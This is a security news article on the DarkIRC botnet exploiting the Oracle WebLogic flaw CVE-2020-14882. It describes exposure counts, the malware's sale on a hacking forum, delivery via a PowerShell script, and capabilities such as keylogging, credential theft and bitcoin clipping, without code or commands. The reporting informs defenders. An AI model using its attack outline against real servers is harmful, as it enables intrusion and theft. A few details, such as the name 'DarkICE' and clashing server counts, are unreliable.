Juniper Threat Labs researchers observed a botnet known as DarkIRC is actively targeting thousands of exposed Oracle WebLogic servers in attacks designed to exploit the CVE-2020-14882 remote code execution (RCE) vulnerability fixed by Oracle two months ago.
Last month, attackers also targeted Oracle WebLogic servers vulnerable to CVE-2020-14882 exploits to deploy Cobalt Strike beacons that allow for persistent remote access to compromised servers for harvesting information and deploying second stage malware payloads.
According to Shodan, 2,973 Oracle WebLogic servers exposed online are potentially vulnerable to remote attacks exploiting the above flaw. Most of these systems are in China (829), followed by the United States (526) and Iran (369).
This vulnerability, if successfully exploited, allows unauthenticated remote code execution. Researchers found almost 3,109 open Oracle WebLogic servers using Shodan.
The Oracle WebLogic Server is one of the most famous application servers used to create and expand all enterprise Java EE applications. According to cybersecurity researchers, the WebLogic Server has a flaw that is named CVE-2020-14882; this flaw stands in rank 9.8 out of 10 on the CVSS scale.
On the other side, Oracle asserted that the attack is “low” in complication and needs no perquisites and no user communication. This flaw can easily be exploited by threat actors with network access through HTTP.
Juniper Threat Labs researchers observed at least five different variants of the malicious payload.
The most interesting is the DarkIRC malware “currently being sold on hack forums for $75.”
The threat actor selling the DarkIRC botnet on Hack Forums goes by the name of Freak_OG and started advertising it beginning with August 2020.
Juniper Threat Labs didn’t say that this threat actor is behind the ongoing DarkICE attacks even though the filename of one of the recently detected payloads is similar to a FUD (Fully Undetected) Crypter filename also advertised by Freak_OG earlier this month.
“We are not certain if the bot operator who attacked our honeypot is the same person who is advertising this malware in Hack Forums or one of his/her customers,” the report reads.
DarkIRC is delivered on unpatched servers using a PowerShell script executed via an HTTP GET request in the form of a malicious binary that comes with both anti-analysis and anti-sandbox capabilities.
DarkIRC comes with a multitude of capabilities including but not limited to keylogging, downloading files and executing commands on the infected server, credential stealing, spreading to other devices via MSSQL and RDP (brute force), SMB, or USB, as well as launching several versions of DDoS attacks.
Attackers can also use the bot as a Bitcoin clipper that allows them to change bitcoin wallet addresses copied to the clipboard to one controlled by its operators in real-time.